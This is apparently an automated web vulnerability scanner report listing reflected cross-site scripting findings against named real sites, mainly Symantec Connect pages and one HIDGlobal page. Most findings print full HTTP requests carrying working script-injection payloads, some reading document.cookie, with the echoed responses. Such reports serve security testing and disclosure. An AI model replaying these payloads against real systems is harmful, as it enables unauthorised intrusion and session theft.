GET /connect/sites/default/themes/connect2/images7aeb8'-alert(1)-'01422918865/sprite-theme.png?32 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:48 +0000
Vary: Cookie
ETag: "1297710408"
Content-Type: text/html; charset=utf-8
Content-Length: 33589
X-Varnish: 1477191742
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:06:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images7aeb8'-alert(1)-'01422918865/sprite-theme.png?32';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.44. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-theme.png

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34d90'-alert(1)-'939c6f31460 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/sprite-theme.png34d90'-alert(1)-'939c6f31460?32 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:07:19 +0000
Vary: Cookie
ETag: "1297710439"
Content-Type: text/html; charset=utf-8
Content-Length: 33589
X-Varnish: 1477192186
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1760
Date: Mon, 14 Feb 2011 19:07:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png34d90'-alert(1)-'939c6f31460?32';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.45. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51967'-alert(1)-'899ba7d62d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba351967'-alert(1)-'899ba7d62d7/default/themes/connect2/images/NaN HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:38 +0000
Vary: Cookie
ETag: "1297710398"
Content-Type: text/html; charset=utf-8
Content-Length: 33805
X-Varnish: 1477191572
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:06:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba351967'-alert(1)-'899ba7d62d7/default/themes/connect2/images/NaN';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.46. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8996a'-alert(1)-'7e6d3f9c7c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default8996a'-alert(1)-'7e6d3f9c7c0/themes/connect2/images/NaN HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:07:01 +0000
Vary: Cookie
ETag: "1297710421"
Content-Type: text/html; charset=utf-8
Content-Length: 33805
X-Varnish: 1477191935
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:07:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default8996a'-alert(1)-'7e6d3f9c7c0/themes/connect2/images/NaN';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.47. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a8d'-alert(1)-'3e84e86478c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes85a8d'-alert(1)-'3e84e86478c/connect2/images/NaN HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:07:37 +0000
Vary: Cookie
ETag: "1297710457"
Content-Type: text/html; charset=utf-8
Content-Length: 33805
X-Varnish: 1477192402
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:07:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes85a8d'-alert(1)-'3e84e86478c/connect2/images/NaN';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.48. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82271'-alert(1)-'aad1ccc7d12 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect282271'-alert(1)-'aad1ccc7d12/images/NaN HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:08:07 +0000
Vary: Cookie
ETag: "1297710487"
Content-Type: text/html; charset=utf-8
Content-Length: 33805
X-Varnish: 1761091142
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:08:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect282271'-alert(1)-'aad1ccc7d12/images/NaN';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.49. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce825'-alert(1)-'35d7a06203 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/imagesce825'-alert(1)-'35d7a06203/NaN HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:08:38 +0000
Vary: Cookie
ETag: "1297710518"
Content-Type: text/html; charset=utf-8
Content-Length: 33798
X-Varnish: 1477193003
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:08:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/imagesce825'-alert(1)-'35d7a06203/NaN';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.50. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d180'-alert(1)-'f60c3ae9a97 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN3d180'-alert(1)-'f60c3ae9a97 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:09:05 +0000
Vary: Cookie
ETag: "1297710545"
Content-Type: text/html; charset=utf-8
Content-Length: 33805
X-Varnish: 1761091544
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:09:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN3d180'-alert(1)-'f60c3ae9a97';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.51. http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a02e3'-alert(1)-'30b7b2ffd48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN?a02e3'-alert(1)-'30b7b2ffd48=1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:05:53 +0000
Vary: Cookie
ETag: "1297710353"
Content-Type: text/html; charset=utf-8
Content-Length: 33624
X-Varnish: 1477190995
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:05:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/NaN?a02e3'-alert(1)-'30b7b2ffd48=1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.52. http://www.hidglobal.com/onlineOrderStatusRegistration.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fbcd0'><script>alert(1)</script>b2f844e050f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /onlineOrderStatusRegistration.php HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
